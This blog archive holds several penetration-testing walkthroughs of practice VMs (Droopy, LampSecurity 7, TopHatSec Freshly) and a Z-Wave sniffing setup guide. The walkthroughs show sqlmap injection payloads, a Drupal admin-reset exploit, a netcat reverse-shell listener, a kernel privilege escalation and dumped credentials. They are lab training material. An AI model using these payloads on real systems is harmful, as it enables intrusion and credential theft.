oldsmokingjoe: 2016

Friday, 29 April 2016

Walkthrough Droopy v.02

Walkthrough Droopy v.02 :

In this post i shall outline the steps i followed to get root on Droopy hosted at vulnhub . https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards i shall try to enlist all the useful links i used to compromise the box for posterity.

Detailed Steps to root :

A nmap scan of the box reveals that only port 80 is open and there seems to be a Drupal 7 website hosted. After running nikto and dirbuster i decided to run a tool to enumerate CMS's. I know a good one exists for wordpress but surpisingly i could not find much for Drupal. I did come across a tool called CMSMap which according to this github page enumerates wordpress, drupal and joomla . I decided to give this a try to see any information it could reveal. Also i really wanted to be able to learn about Drupal enumeration tools and techniques.

Since the tool is not already built in Kali i decided to follow the github instructions and build it on my box.

	./cmsmap.py -t http://192.168.238.132/ -f D -F
	[-] Date & Time: 29/04/2016 07:31:43
	[-] Target: http://192.168.238.132
	[M] Website Not in HTTPS: http://192.168.238.132
	[I] Server: Apache/2.4.7 (Ubuntu)
	[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
	[L] X-Generator: Drupal 7 (http://drupal.org)
	[L] X-Frame-Options: Not Enforced
	[I] Strict-Transport-Security: Not Enforced
	[I] X-Content-Security-Policy: Not Enforced
	[I] X-Content-Type-Options: Not Enforced
	[L] Robots.txt Found: http://192.168.238.132/robots.txt
	[I] CMS Detection: Drupal
	[I] Drupal Version: 7.30
	[H] Drupal Vulnerable to SA-CORE-2014-005
	[I] Drupal Theme: bartik
	[-] Enumerating Drupal Usernames via "Views" Module...
	[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
	[-] Drupal Default Files:
	[I] http://192.168.238.132/README.txt
	[I] http://192.168.238.132/INSTALL.mysql.txt
	[I] http://192.168.238.132/MAINTAINERS.txt
	[I] http://192.168.238.132/profiles/standard/translations/README.txt
	[I] http://192.168.238.132/profiles/minimal/translations/README.txt
	[I] http://192.168.238.132/INSTALL.pgsql.txt
	[I] http://192.168.238.132/UPGRADE.txt
	[I] http://192.168.238.132/CHANGELOG.txt
	[I] http://192.168.238.132/INSTALL.sqlite.txt
	[I] http://192.168.238.132/LICENSE.txt
	[I] http://192.168.238.132/INSTALL.txt
	[I] http://192.168.238.132/COPYRIGHT.txt
	[I] http://192.168.238.132/web.config
	[I] http://192.168.238.132/modules/README.txt
	[I] http://192.168.238.132/modules/simpletest/files/README.txt
	[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
	[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
	[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
	[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
	[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
	[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
	[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
	[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
	[I] http://192.168.238.132/themes/README.txt
	[I] http://192.168.238.132/themes/stark/README.txt
	[I] http://192.168.238.132/sites/README.txt
	[I] http://192.168.238.132/sites/all/modules/README.txt
	[I] http://192.168.238.132/sites/all/themes/README.txt
	[I] http://192.168.238.132/modules/simpletest/files/html-2.html
	[I] http://192.168.238.132/modules/color/preview.html
	[I] http://192.168.238.132/themes/bartik/color/preview.html
	[-] Interesting Directories/Files ...
	[L] http://192.168.238.132/info.php
	[L] http://192.168.238.132/install.php
	[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
	[-] Search Drupal Modules ...
	[I] comment
	[I] content
	[I] field
	[I] node
	[I] search
	[I] system
	[I] user
	[I] aggregator
	[I] block
	[I] blog
	[I] book
	[I] color
	[I] comment
	[I] contact
	[I] contextual
	[I] dashboard
	[I] dblog
	[I] field
	[I] field_ui
	[I] file
	[I] filter
	[I] forum
	[I] help
	[I] image
	[I] locale
	[I] menu
	[I] node
	[I] openid
	[I] overlay
	[I] path
	[I] php
	[I] poll
	[I] profile
	[I] rdf
	[I] search
	[I] shortcut
	[I] simpletest
	[I] statistics
	[I] syslog
	[I] system
	[I] taxonomy
	[I] toolbar
	[I] tracker
	[I] translation
	[I] trigger
	[I] update
	[I] user
	[I] Checking for Directory Listing Enabled ...
	[L] http://192.168.238.132/includes/
	[L] http://192.168.238.132/misc/
	[L] http://192.168.238.132/modules/
	[L] http://192.168.238.132/profiles/
	[L] http://192.168.238.132/scripts/
	[L] http://192.168.238.132/sites/
	[L] http://192.168.238.132/includes/
	[L] http://192.168.238.132/themes/
	[L] http://192.168.238.132/modules/comment
	[L] http://192.168.238.132/modules/field
	[L] http://192.168.238.132/modules/node
	[L] http://192.168.238.132/modules/search
	[L] http://192.168.238.132/modules/system
	[L] http://192.168.238.132/modules/user
	[L] http://192.168.238.132/modules/aggregator
	[L] http://192.168.238.132/modules/block
	[L] http://192.168.238.132/modules/blog
	[L] http://192.168.238.132/modules/book
	[L] http://192.168.238.132/modules/color
	[L] http://192.168.238.132/modules/comment
	[L] http://192.168.238.132/modules/contact
	[L] http://192.168.238.132/modules/contextual
	[L] http://192.168.238.132/modules/dashboard
	[L] http://192.168.238.132/modules/dblog
	[L] http://192.168.238.132/modules/field
	[L] http://192.168.238.132/modules/field_ui
	[L] http://192.168.238.132/modules/file
	[L] http://192.168.238.132/modules/filter
	[L] http://192.168.238.132/modules/forum
	[L] http://192.168.238.132/modules/help
	[L] http://192.168.238.132/modules/image
	[L] http://192.168.238.132/modules/locale
	[L] http://192.168.238.132/modules/menu
	[L] http://192.168.238.132/modules/node
	[L] http://192.168.238.132/modules/openid
	[L] http://192.168.238.132/modules/overlay
	[L] http://192.168.238.132/modules/path
	[L] http://192.168.238.132/modules/php
	[L] http://192.168.238.132/modules/poll
	[L] http://192.168.238.132/modules/profile
	[L] http://192.168.238.132/modules/rdf
	[L] http://192.168.238.132/modules/search
	[L] http://192.168.238.132/modules/shortcut
	[L] http://192.168.238.132/modules/simpletest
	[L] http://192.168.238.132/modules/statistics
	[L] http://192.168.238.132/modules/syslog
	[L] http://192.168.238.132/modules/system
	[L] http://192.168.238.132/modules/taxonomy
	[L] http://192.168.238.132/modules/toolbar
	[L] http://192.168.238.132/modules/tracker
	[L] http://192.168.238.132/modules/translation
	[L] http://192.168.238.132/modules/trigger
	[L] http://192.168.238.132/modules/update
	[L] http://192.168.238.132/modules/user
	[-] Date & Time: 29/04/2016 07:37:02
	[-] Completed in: 0:05:19

view raw gistfile1.txt hosted with ❤ by GitHub

The tool was quite good at enumerating the Drupal website and immediately tells us that the site is outdated and suffers from a known vulnerability "Drupal Vulnerable to SA-CORE-2014-005".

Seems like there exists a possibility of launching SQL injection attacks against the box. I decided to use an existing exploit against the box. The exploit https://www.exploit-db.com/exploits/34984/ helps to change the admin credentials on the backend site.

	python drupal_exploit.py http://192.168.238.132/ admin hello
	host username password
	http://nope.io admin wowsecure
	Success!
	Login now with user:admin and pass:hello

view raw gistfile1.txt hosted with ❤ by GitHub

The exploit worked and now we have changed the admin credentials on the box. We now login to the box with credentials "admin:hello".

Once we are able to login to the box we are able to create additional posts/pages. Checking under the "Modules" tab i see that there is a plugin called "phpfilter" which can be enabled to allow php content to be executed on the webpage. This opens the possibility of executing some php reverse shell code by creating a webpage and executing the same via the webserver. Hence we try this approach. I use standard reverse shell from pentest monkey.

	nc -lvnp 4545
	listening on [any] 4545 ...
	connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
	Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
	09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
	USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$ uname -a
	Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
	$ hostname
	droopy
	$ cat /etc/issue
	Ubuntu 14.04.1 LTS \n \l

	$ arch
	x86_64

view raw gistfile1.txt hosted with ❤ by GitHub

Once we get a reverse shell we see that the box is a 64bit ubuntu 14.04 box which is known to be vulnerable to local priv escaltion exploit https://www.exploit-db.com/exploits/37292/ We compile and run the exploit to get root on the box .

	$ gcc ubuntu_ex.c -o ub
	gcc ubuntu_ex.c -o ub
	$ ./ub
	./ub
	spawning threads
	mount #1
	mount #2
	child threads done
	/etc/ld.so.preload created
	creating shared library
	# id
	id
	uid=0(root) gid=0(root) groups=0(root),33(www-data)
	#

view raw gistfile1.txt hosted with ❤ by GitHub

	$ gcc ubuntu_ex.c -o ub
	gcc ubuntu_ex.c -o ub
	$ ./ub
	./ub
	spawning threads
	mount #1
	mount #2
	child threads done
	/etc/ld.so.preload created
	creating shared library
	# id
	id
	uid=0(root) gid=0(root) groups=0(root),33(www-data)
	#

view raw gistfile1.txt hosted with ❤ by GitHub

Also for completeness I must admit I could have also used a Metasploit module to get a shell but i wanted to avoid using metasploit as much as possible :0

Final Verdict :

Overall it was relatively easy box to pawn but fun nevertheless. Thanks for the creator to take time to create one . Keep up the good work "knightmare" .

Useful Links :

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon

Wednesday, 13 April 2016

Z-wave protocol analysis using Ez-Wave

Background: Recently I was able to get my hands on a couple of IoT devices talking the propriety Z-wave protocol. Specifically I had 2 devices -

i) Z-Wave 3 in 1 PIR Motion sensor which can detect movement, temperature and luminance.
ii) Z-Wave smart Energy Plug which can give information about the energy cosumption of the device connected to it. Also it can switch the device ON/OFF depending on the requests sent to it by a Z-Wave controller.

These devices are already deployed in many smart homes. Hence its important to analyze the security capabilities of these devices. This got me rolling and here is post about how to sniff Z-wave packets using SDR. It seems that the state of the art in pentesting any wireless comunnication protocol is by using these SDRs.

A detailed security assessment of Z-Wave protocol and Z-Wave enabled devices was presented at ShamooCon 2016 Breaking Bulbs Briskly by Bogus Broadcasts https://www.youtube.com/watch?v=IgquSEhAGvA by Joseph Hall and Ben Ramsey which details the how many Z-Wave device manufacturers disregard security and dont even encrypt the data exchanged between the Z-wave device and the Z-wave controller. This opens up possibilities of a range of attacks that can be launched on the Z-wave devices. They also release a open source tool to play around and sniff these packets called EZ-Wave . In this post i shall try to sniff some of the traffic generated by my Z-Wave devices.

EZ-wave Installation:

Install EZ-wave dependencies:

The instructions for installation are detailed on the github site @ https://github.com/AFITWiSec/EZ-Wave. However there are a number of software bundles that need to be installed especially the Gnu-radio which has a lot of dependencies. Hence instead of installing all these packages myself i used a linux distribution Pentoo Linux. (http://www.pentoo.ch/about). The advantage of using the Pentoo linux is that all the software requited for EZ-Wave installation such as GNU Radio, OsmocomSDR, HackRF host software, Wireshark etc are all pre-installed in the distro saving the time to install them manually.

The simplest way is to download the pentoo linux package from the downloads section of the site and then burn the image into a live USB stick. One important thing to note here is that Michael Ossmann (maker of HackRF) highly recommends in his "Introduction to SDR " tutorial (https://greatscottgadgets.com/sdr/) to not connect the HackRF to any virtual machine for performance reasons but to use it directly on the base OS. Also on a side note if you are a newbie its highly recommended to go through at least his first tutorial where he introduces the SDR concepts (https://greatscottgadgets.com/sdr/1/) and also the tutorial on HackRF usage. (https://greatscottgadgets.com/sdr/5/) .

We now boot from the live USB. (In case you get an error like boot device not found press "Tab" on the keyboard and select pentoo5 OS or type it and press enter). The Pentoo linux should boot correctly. Launch an GUI using the "startx" command. In case there is no IP address allocated to the box just do a "dhcpcd eth0" to request an IP address.

Now to test that we have the HackRF software working correctly plugin the hackrf devices into the USB port and run the command "hackrf_info" . I use 2 Hackrfs since they are half-duplex and i wish to receive and transmit at the same time.

	pentoo tools # hackrf_info
	Found HackRF board 0:
	Board ID Number: 2 (HackRF One)
	Firmware Version: 2014.08.1
	Part ID Number: 0xa000cb3c 0x006a434b
	Serial Number: 0x00000000 0x00000000 0x14d463dc 0x0f54c1e1

	Found HackRF board 1:
	Board ID Number: 2 (HackRF One)
	Firmware Version: 2014.08.1
	Part ID Number: 0xa000cb3c 0x004f434b
	Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f7c35e1
	pentoo tools #

view raw gistfile1.txt hosted with ❤ by GitHub

Install Scapy-Radio

We can see that both our devices are correctly detected. Next we install the EZ-wave tool itself. We run the setup.sh script which clones the scapy framework
and then we install it.


	./setup.sh
	cd root/scapy-radio
	./install.sh scapy
	./install.sh blocks
	./install.sh grc

view raw gistfile1.txt hosted with ❤ by GitHub

I noticed that if you use pentoo linux then you dont need to worry about making changes to the gnu-radio config file.

Install Wireshark

We downloaded the source package for wireshark version 1.12.10 from https://www.wireshark.org/download/src/. Copy the wireshark dissectors files to the wireshark-1.12.10/epan/dissectors. Wireshark by default tries to use Qt version5 for building the wireshark UI. This gave me errors so i choose to make my wireshark ui with gtk3. Hence its important to tell wireshark to use gtk3 library instead of qt5 libraries at the config stage. Hence our steps to build wireshark were

	pentoo wireshark-1.12.10 # ./autogen.sh
	aclocal -I ./aclocal-fallback
	libtoolize --copy --force
	....
	....
	....

	Now type "./configure [options]" and "make" to compile Wireshark.

	pentoo wireshark-1.12.10 # ./configure --with-qt=no --with-gtk3=yes
	checking build system type... i686-pc-linux-gnu
	checking host system type... i686-pc-linux-gnu
	....
	....
	....
	config.status: executing libtool commands

	The Wireshark package has been configured with the following options.
	Build wireshark (Gtk+) : yes (with GTK+ 3)
	Build wireshark-qt : no
	Build tshark : yes
	Build capinfos : yes
	Build captype : yes
	Build editcap : yes
	Build dumpcap : yes
	Build mergecap : yes
	Build reordercap : yes
	Build text2pcap : yes
	Build randpkt : yes
	Build dftest : yes
	Build rawshark : yes

	Save files as pcap-ng by default : yes
	Install dumpcap with capabilities : no
	Install dumpcap setuid : no
	Use dumpcap group : (none)
	Use plugins : yes
	Use Lua library : yes
	Use Python binding : no
	Build rtp_player : yes
	Build profile binaries : no
	Use pcap library : yes
	Use zlib library : yes
	Use kerberos library : yes (MIT)
	Use c-ares library : yes
	Use GNU ADNS library : no (using c-ares instead)
	Use SMI MIB library : yes
	Use GNU crypto library : yes
	Use SSL crypto library : no
	Use IPv6 name resolution : yes
	Use gnutls library : yes
	Use POSIX capabilities library : yes
	Use GeoIP library : yes
	Use nl library : yes (v3)
	Use SBC codec library : yes
	pentoo wireshark-1.12.10 # make
	pentoo wireshark-1.12.10 # sudo make install
	pentoo wireshark-1.12.10 # ldconfig

view raw gistfile1.txt hosted with ❤ by GitHub

EZ-Wave Usage:

In order to sniff packets we start gnu-radio companion and provide it as input the Zwave radio configuration file.

Select the Zwave.grc file to open in the gnuradio-companion

One important thing to take note of in the .grc file is the variable central frequency i.e center_freq . The European standard Z-wave devices ( which I have ) talk on 868.42 Mhz ( instead of the default central frequency hardcoded in the .grc file which is for the US Z-wave devices) and hence this variable needs to be changed to reflect the frequency of your device. To change the variable double click it and then key in the new value.

gnuradio-companion main window

After changing the .grc file we need to recompile the flow graph. Finally we can run it by pressing the play button on the top menu. (Also make sure that the python modules are in the python path environment variable else there may be some errors)

The HackRFs should now be able to pick up Z-wave packets in the vicinity. I forced the Z-wave device to send some packets by pressing the button on the device body. All the captured Z-wave packets are sent to localhost:52002 and can be seen using the wireshark and the new dissector. You can apply some filters like !icmp to remove the interrogation commands sent to the Z-wave devices.

Wireshark Z-wave packet capture

We can see the homid and nodeid of the captured Z-wave packet. The data exchanged between the Z-wave controller and the Z-wave device is also not encrypted.

Sunday, 21 February 2016

Walkthrough LampSecurity Version 7

CTF series LAMP SECURITY 7 : I have been spending a lot of time trying to improve my hacking skills in order to prepare for my OFFSEC certification challenge. I have been struggling to improve my average time to compromise a box ( remember i need to do 5 in 24 hours to clear the offsec challenge) so any easy boxes i find along the way are welcome :P . They kinda increase my confidence. Lampsecurity7 seems like one such box. I am glad i pawned it and that too in optimal time (imho since the time can greatly vary depending upon the skill of the person). Thanks to the author for helping me prepare for the exam :-)

Detailed Steps to get root :

An nmap scan of the box reveals a number of open services.

	Not shown: 64991 filtered ports
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
	\| ssh-hostkey:
	\| 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
	\|_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
	80/tcp open http Apache httpd 2.2.15 ((CentOS))
	\| http-methods:
	\|_ Supported Methods: GET HEAD POST OPTIONS
	\|_http-server-header: Apache/2.2.15 (CentOS)
	\|_http-title: Mad Irish Hacking Academy
	137/tcp closed netbios-ns
	138/tcp closed netbios-dgm
	139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
	901/tcp open http Samba SWAT administration server
	\| http-auth:
	\| HTTP/1.0 401 Authorization Required
	\|_ Basic realm=SWAT
	\| http-methods:
	\|_ Supported Methods: GET POST
	\|_http-title: 401 Authorization Required
	5900/tcp closed vnc
	8080/tcp open http Apache httpd 2.2.15 ((CentOS))
	\| http-methods:
	\|_ Supported Methods: GET HEAD POST OPTIONS
	\| http-open-proxy: Potentially OPEN proxy.
	\|_Methods supported:CONNECTION
	\|_http-server-header: Apache/2.2.15 (CentOS)
	\| http-title: Admin :: Mad Irish Hacking Academy
	\|_Requested resource was /login.php
	10000/tcp open http MiniServ 1.610 (Webmin httpd)
	\|_http-favicon: Unknown favicon MD5: 9A2006C267DE04E262669D821B57EAD1
	\| http-methods:
	\|_ Supported Methods: GET HEAD POST OPTIONS
	\| http-robots.txt: 1 disallowed entry
	\|_/
	\|_http-server-header: MiniServ/1.610
	\|_http-title: Login to Webmin
	MAC Address: 00:0C:29:9D:12:A9 (VMware)
	Device type: general purpose
	Running: Linux 2.6.X\|3.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
	OS details: Linux 2.6.32 - 3.13
	Uptime guess: 49.711 days (since Thu Dec 24 10:56:35 2015)
	Network Distance: 1 hop
	TCP Sequence Prediction: Difficulty=263 (Good luck!)
	IP ID Sequence Generation: All zeros

	Host script results:
	\| smb-os-discovery:
	\| OS: Unix (Samba 3.5.10-125.el6)
	\| Computer name: localhost
	\| NetBIOS computer name:
	\| Domain name:
	\| FQDN: localhost
	\|_ System time: 2016-01-28T10:39:45-05:00
	\| smb-security-mode:
	\| account_used: guest
	\| authentication_level: user
	\| challenge_response: supported
	\|_ message_signing: disabled (dangerous, but default)
	\|_smbv2-enabled: Server doesn't support SMBv2 protocol

	TRACEROUTE
	HOP RTT ADDRESS
	1 0.74 ms 192.168.116.139

view raw gistfile1.txt hosted with ❤ by GitHub

We see a webapplication running on the box. While playing around with the webapplication we notice the /newsletter URL which by adding a ' to the URL we a detailed error message printed out which leads us to believe that the box suffers from sql injection.

We capture the traffic using burp and run sqlmap to see if we can find any interesting databases.

	cat sql.file
	GET /newsletter&id=1 HTTP/1.1
	Host: 192.168.116.139
	User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Cookie: PHPSESSID=pv1evkh5h3rjfajojfdbiqnd72; testing=1; roundcube_sessid=0oo5o02r2217dbff3t53j40j06
	Connection: close

view raw gistfile1.txt hosted with ❤ by GitHub

	sqlmap -r sql.file --dbs
	_
	___ ___\| \|_____ ___ ___ {1.0-dev-nongit-201602070a89}
	\|_ -\| . \| \| \| .'\| . \|
	\|___\|_ \|_\|_\|_\|_\|__,\| _\|
	\|_\| \|_\| http://sqlmap.org

	[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

	[*] starting at 11:47:12
	........


	sqlmap resumed the following injection point(s) from stored session:
	---
	Parameter: #1* (URI)
	Type: boolean-based blind
	Title: AND boolean-based blind - WHERE or HAVING clause
	Payload: http://192.168.116.139:80/newsletter&id=1 AND 6207=6207

	Type: error-based
	Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
	Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT 2804 FROM(SELECT COUNT(),CONCAT(0x7176707671,(SELECT (ELT(2804=2804,1))),0x716a767a71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

	Type: AND/OR time-based blind
	Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
	Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xbRE)

	Type: UNION query
	Title: Generic UNION query (NULL) - 5 columns
	Payload: http://192.168.116.139:80/newsletter&id=-9786 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176707671,0x6645506a52417641745455654c44514f5554746b42486e4f496a434c6b6a5372506f766a696a4f4f,0x716a767a71),NULL-- -
	---
	[11:47:14] [INFO] the back-end DBMS is MySQL
	web server operating system: Linux CentOS 6.5
	web application technology: PHP 5.3.3, Apache 2.2.15
	back-end DBMS: MySQL 5
	[11:47:14] [INFO] fetching database names
	[11:47:14] [INFO] the SQL query used returns 4 entries
	[11:47:14] [INFO] resumed: information_schema
	[11:47:14] [INFO] resumed: mysql
	[11:47:14] [INFO] resumed: roundcube
	[11:47:14] [INFO] resumed: website
	available databases [4]:
	[*] information_schema
	[*] mysql
	[*] roundcube
	[*] website

view raw gistfile1.txt hosted with ❤ by GitHub

Sqlmap is able to dump a few databases for us namely i) information_schema
ii) mysql iii) roundcube & iv) website

We try to dump the contents of these databases using the sqlmap -D parameter

	sqlmap -r sql.file --dbs -D website --dump

	....
	....

	[11:47:43] [INFO] fetching tables for database: 'website'
	[11:47:43] [INFO] the SQL query used returns 9 entries
	[11:47:43] [INFO] resumed: contact
	[11:47:43] [INFO] resumed: documents
	[11:47:43] [INFO] resumed: hits
	[11:47:43] [INFO] resumed: log
	[11:47:43] [INFO] resumed: newsletter
	[11:47:43] [INFO] resumed: payment
	[11:47:43] [INFO] resumed: trainings
	[11:47:43] [INFO] resumed: trainings_x_users
	[11:47:43] [INFO] resumed: users
	[11:47:43] [INFO] fetching columns for table 'hits' in database 'website'
	....
	....
	Database: website
	Table: users
	[13 entries]
	+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
	\| user_id \| profile \| username \| realname \| password \| last_login \|
	+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
	\| 4 \| <blank> \| john@localhost.localdomain \| John Durham \| 0d9ff2a4396d6939f80ffe09b1280ee1 \| NULL \|
	\| 5 \| <blank> \| alice@localhost.localdomain \| Alice Wonder \| 2146bf95e8929874fc63d54f50f1d2e3 \| NULL \|
	\| 6 \| <blank> \| ruby@localhost.localdomain \| Ruby Spinster \| 9f80ec37f8313728ef3e2f218c79aa23 \| NULL \|
	\| 7 \| <blank> \| leon@localhost.localdomain \| Leon Parnetta \| 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) \| NULL \|
	\| 8 \| <blank> \| julia@localhost.localdomain \| Julia Fields \| ed2539fe892d2c52c42a440354e8e3d5 (madrid) \| NULL \|
	\| 9 \| <blank> \| michael@localhost.localdomain \| Michael Saint \| 9c42a1346e333a770904b2a2b37fa7d3 (somepassword) \| NULL \|
	\| 10 \| <blank> \| bruce@localhost.localdomain \| Bruce Pottricks \| 3a24d81c2b9d0d9aaf2f10c6c9757d4e \| NULL \|
	\| 11 \| <blank> \| neil@localhost.localdomain \| Neil Felstein \| 4773408d5358875b3764db552a29ca61 \| NULL \|
	\| 12 \| <blank> \| charles@localhost.localdomain \| Charles Adams \| b2a97bcecbd9336b98d59d9324dae5cf \| NULL \|
	\| 36 \| <blank> \| foo@bar.com \| <blank> \| 4cb9c8a8048fd02294477fcb1a41191a (changeme) \| NULL \|
	\| 114 \| <blank> \| <blank> \| <blank> \| d41d8cd98f00b204e9800998ecf8427e () \| NULL \|
	\| 113 \| <blank> \| test@nowhere.com \| <blank> \| 098f6bcd4621d373cade4e832627b4f6 (test) \| NULL \|
	\| 3 \| Brian is our technical brains behind the operations and a chief trainer. \| brian@localhost.localdomain \| Brian Hershel \| e22f07b17f98e0d9d364584ced0e3c18 \| 2012-12-19 11:30:54 \|
	+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+

view raw gistfile1.txt hosted with ❤ by GitHub

Sqlmap is able to dump various tables in the website database. We keep dumping the contents of these various tables till we see that the `users` table dumps a list of possible database users and their credentials (sqlmap helps us crack these as well . its so amazing and powerful !) . Luckily we see that the passwords are not salted.

We know that the box is running a ssh service so we try to login to the box hoping that at least some user would have reused his ssh credentials.

We ssh into the box and seems like julia is in the sudo users list and we can immediately escalate our priv to root :-) Simple and easy

	ssh julia@192.168.116.139
	julia@192.168.116.139's password:
	Last login: Thu Jan 28 17:58:01 2016 from 192.168.116.137
	[julia@localhost ~]$ id
	uid=506(julia) gid=506(julia) groups=506(julia),10(wheel),511(sales) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
	[julia@localhost ~]$ sudo /bin/bash
	[sudo] password for julia:
	[root@localhost julia]#

view raw gistfile1.txt hosted with ❤ by GitHub

Sunday, 7 February 2016

Walkthrough TopHatSec Freshly

Mission `Freshly` VM : I downloaded the virtual machine hosted at https://www.vulnhub.com/entry/tophatsec-freshly,118/ . There are a couple of challenges from TopHatSec and I would like to try them both. Well for starters here is `Freshly` :-)

Detailed steps for getting root :

A nmap scan of the box reveals that ports 80,443 and 8080 are publically accessible on the box.

We quickly run both nikto and dirbuster against the webserver. We see that the VM is running a login application on port 80 while on the other ports it is running a wordpress blog.

Wordpress blog

We also see an installation of phpmyadmin on the webserver. We try the default credentials but dont succeed. Since there is a phpmydamin running on the box we guess that there may be mysql server running at the backend as well. Hence we try mysql authentication bypass by using a wronguser' or 1=1 LIMIT 1;# as username and junk as password. However we are not successful. Inspite of this its worth the effort to run sqlmap against the server to see if it can pick up some injection points either in the username or password fields.

sqlmap -o -u http://192.168.116.135/login.php --forms --dbs

view raw gistfile1.txt hosted with ❤ by GitHub

	POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
	sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
	---
	Parameter: user (POST)
	Type: AND/OR time-based blind
	Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
	Payload: user=VXNQ' AND (SELECT * FROM (SELECT(SLEEP(5)))BNMi) AND 'EOBB'='EOBB&password=&s=Submit
	---
	do you want to exploit this SQL injection? [Y/n] y
	[05:29:12] [INFO] the back-end DBMS is MySQL
	web server operating system: Linux Ubuntu
	web application technology: Apache 2.4.7, PHP 5.5.9
	back-end DBMS: MySQL 5.0.12

view raw gistfile1.txt hosted with ❤ by GitHub

Sqlmap tells us that the `user` parameter of the login form is sucesptibel to a mysql injection vulnerabilty. It readily exploits this vulnerability for us to give us a complete dump of the database when we use the --dump sqlmap option.


	sqlmap -o -u http://192.168.116.135/login.php --forms --dump --dbs
	....
	....
	....

	05:54:23] [INFO] resumed: wordpress8080
	available databases [7]:
	[*] information_schema
	[*] login
	[*] mysql
	[*] performance_schema
	[*] phpmyadmin
	[*] users
	[*] wordpress8080

view raw gistfile1.txt hosted with ❤ by GitHub

Excellent! now we can see that there are a total of 7 databases in the database. We must check out the interesting ones especially login, phpmyadmin, users and wordpress8080.


	1) TABLE LOGIN

	05:53:38] [INFO] analyzing table dump for possible password hashes
	Database: login
	Table: users
	[2 entries]
	+----------+-----------+
	\| password \| user_name \|
	+----------+-----------+
	\| password \| candyshop \|
	\| PopRocks \| Sir \|
	+----------+-----------+

	2) TABLE wordpress8080

	Database: wordpress8080
	Table: users
	[1 entry]
	+----------+---------------------+
	\| username \| password \|
	+----------+---------------------+
	\| admin \| SuperSecretPassword \|
	+----------+---------------------+

	3) TABLE users

	[06:03:42] [WARNING] database 'users' appears to be empty
	[06:03:42] [ERROR] unable to retrieve the table names for any database
	do you want to use common table existence check? [y/N/q] n
	[06:03:50] [CRITICAL] unable to retrieve the tables in database 'users'


	4) TABLE phpmyadmin
	Database: phpmyadmin
	Table: pma_table_info
	[0 entries]
	+---------+------------+---------------+
	\| db_name \| table_name \| display_field \|
	+---------+------------+---------------+
	+---------+------------+---------------+

	Database: phpmyadmin
	Table: pma_relation
	[0 entries]
	+-----------+------------+--------------+--------------+---------------+---------------+
	\| master_db \| foreign_db \| master_table \| master_field \| foreign_table \| foreign_field \|
	+-----------+------------+--------------+--------------+---------------+---------------+
	+-----------+------------+--------------+--------------+---------------+---------------+

	[WARNING] table 'pma_table_uiprefs' in database 'phpmyadmin' appears to be empty
	Database: phpmyadmin
	Table: pma_table_uiprefs
	[0 entries]
	+-------+---------+----------+------------+-------------+
	\| prefs \| db_name \| username \| table_name \| last_update \|
	+-------+---------+----------+------------+-------------+
	+-------+---------+----------+------------+-------------+

	Seems the rest of the tables of the phpmyadmin database are empty as well .

view raw gistfile1.txt hosted with ❤ by GitHub

It seems that the table dump for the wordpress8080 database contains the admin password for the wordpress blog. We try to login to the wordpress blog via the credentials and we are successful!

Once we have admin credentails on the wordpress getting a shell on the box is extremely simple. By default wordpress will not allow any php content to be run from the wordpress articles/posts. However since we have admin privs on the wordpress we can install a plugin called Exec-php to allow php code to run in the wordpress pages.

